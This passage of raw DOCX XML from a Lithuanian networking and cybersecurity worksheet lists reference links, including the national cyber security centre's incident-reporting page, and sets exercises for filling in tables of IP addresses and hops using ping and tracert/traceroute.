        <w:t xml:space="preserve">Global threat activity. </w:t>
      </w:r>
      <w:r w:rsidR="17CDFDD1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidR="5EEA3294" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId92">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/en-us/wdsi/threats</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="281DFE14" w14:textId="175C12D0" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="7CDB99D1" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Pranešti apie incidentą. </w:t>
      </w:r>
      <w:r w:rsidR="3625F7E8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nacionalinis kibernetinio saugumo centras prie Krašto apsaugos ministerijos.</w:t>
      </w:r>
      <w:r w:rsidR="3625F7E8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5EEA3294" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId93">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.nksc.lt/pranesti.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74AF8D7F" w14:textId="005C5F8A" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76AE999E" w14:textId="06290987"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lastRenderedPageBreak/>
        <w:t>2 užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="00831756" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> KOMPIUTERIO KOMANDINĖJE EILUTĖJE NAUDODAMI ĮRANKĮ „PING“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>UŽPILDYKITE PATEIKTĄ LENTELĘ. NURODYKITE NAUDOJAMO TINKLO IP ADRESUS IR</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00031287" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">GLAUSTAI APIBŪDINKITE </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ADRESO SAVININK</w:t>
      </w:r>
      <w:r w:rsidR="00031287" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3305"/>
        <w:gridCol w:w="3305"/>
        <w:gridCol w:w="3305"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="29BC6F76" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7AB2EB2D" w14:textId="0D22A2B7" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Eil. Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="440717AF" w14:textId="1AC662BA" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IP adresas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3CBB47FA" w14:textId="106BA9B0" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Apibūdinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="47C90B92" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77250184" w14:textId="7396374C" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="697CDEF7" w14:textId="0AE8F75C" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51CEF42E" w14:textId="249FC0AC" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6CF83905" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45312976" w14:textId="065BE7B7" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50899F35" w14:textId="539C502B" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0410BE7C" w14:textId="6F63A9D4" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="54A56BFF" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25B346F8" w14:textId="743914DE" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E2985B4" w14:textId="5A1E8CB4" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E03EDC7" w14:textId="510EF2BD" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="41DDF5F3" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45F88BE0" w14:textId="3DEECE9E" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35C6D832" w14:textId="5C1BA779" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="114ED167" w14:textId="08ECCE98" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="3F56D931" w:rsidRPr="005A5C28" w14:paraId="75A3F5C1" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2902E696" w14:textId="000310FF" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FF09E88" w14:textId="5F865B08" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14030DAE" w14:textId="16FC380F" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="048CBD9B" w14:textId="77777777" w:rsidR="00BF4732" w:rsidRPr="005A5C28" w:rsidRDefault="00BF4732" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="332B435E" w14:textId="30935AA6"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3 užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00831756" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">KOMPIUTERIO KOMANDINĖJE EILUTĖJE </w:t>
      </w:r>
      <w:r w:rsidR="00031287" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NAUDODAMI ĮRANKIUS „TRACERT“ „TRACEROUTE“ </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>UŽPILDYKITE PATEIKTĄ LENTELĘ. NURODYKITE IP ADRESĄ, KURĮ TIKRINATE</w:t>
      </w:r>
      <w:r w:rsidR="00031287" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IR TARPINIUS MAZGUS IKI ADRESO.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3305"/>
        <w:gridCol w:w="3305"/>
        <w:gridCol w:w="3305"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="17759890" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0DEE4610" w14:textId="04C8F7CA" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Eil. Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="291A94B6" w14:textId="1712EA62" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IP adresas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="141BDB89" w14:textId="6B7CED50" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tarpiniai mazgai</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4EF4A494" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EB56618" w14:textId="57E43739" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69381233" w14:textId="08DB0D25" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C634664" w14:textId="40277972" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="373A9DDE" w14:textId="77777777" w:rsidTr="23C33711">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30151A5C" w14:textId="06DE5B1E" w:rsidR="3F56D931" w:rsidRPr="005A5C28" w:rsidRDefault="346334AF" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
